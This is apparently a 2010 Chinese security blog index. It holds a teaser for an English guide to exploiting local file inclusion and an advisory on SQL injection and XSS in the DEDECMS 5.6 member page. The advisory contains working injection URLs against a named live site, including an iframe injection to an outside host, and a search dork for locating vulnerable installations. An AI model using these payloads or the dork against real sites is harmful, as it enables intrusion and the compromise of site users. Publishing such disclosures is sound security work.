2010年4月21日
admin 10,662 views
Local File Inclusion
As the title says, this is a “short” and descriptive guide about
various methods to exploit using a local file inclusion (LFI).
I will cover the following topics:
•Poison NULL Bytes
•Log Poisoning
•/proc/self/
•Alternative Log Poisoning
•Malicious image upload
•Injection of code by the use of e-mails
•Creativity
By: Fredrik Nordberg Almroth
URL: http://h.ackack.net/
So the question is. What is a LFI?
A LFI is, as the title says,
a method for servers/scripts to include local files on run-time,
in order to make complex systems of procedure calls.
Well most of the time, you find the LFI vulnerabilities in URL’s
of the web pages.
Mainly because developers tend to like the use of GET requests
when including pages.
Nothing more. Nothing less.
阅读全文…
2010年4月12日
admin 1,997 views
DEDECMS终于要发布5.6了,期待ing…没办法下到程序,就去做了个黒盒测试,
暂时也没办法分析更多…
嗯,.
会员中心首页(../member/index.php)函数过滤不严格造成盲注,数据库错误模式,XSS
测试站点:http://zz.5u.cn
=============================================
| # Title : DEDECMS V5.6 GBK SQL injection Vulnerability
| # Author : Akira
| # email : MCAkira@HotMail.CoM
| # Home : [url]http://www.hackclub.net[/url]
| # Web Site : [url]http://zz.u5.cn[/url]
| #Download: [url]http://www.dedecms.com[/url]
| # Dork : Powered By DEDECMS.COM © 2004-2010 DEDECMS Inc.
| # Tested on: Microsoft Windows XP SP2 + Lunix (debian 5.0)
| # Bug :SQL injection ,XSS
==================== Exploit By Akira================
http://zz.5u.cn/member/index.php?uid=’%20||%20”%20||%20′%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7
http://zz.5u.cn/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe’”)/>
http://zz.5u.cn/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7′”><iframe%20src=http://www.milsec.net>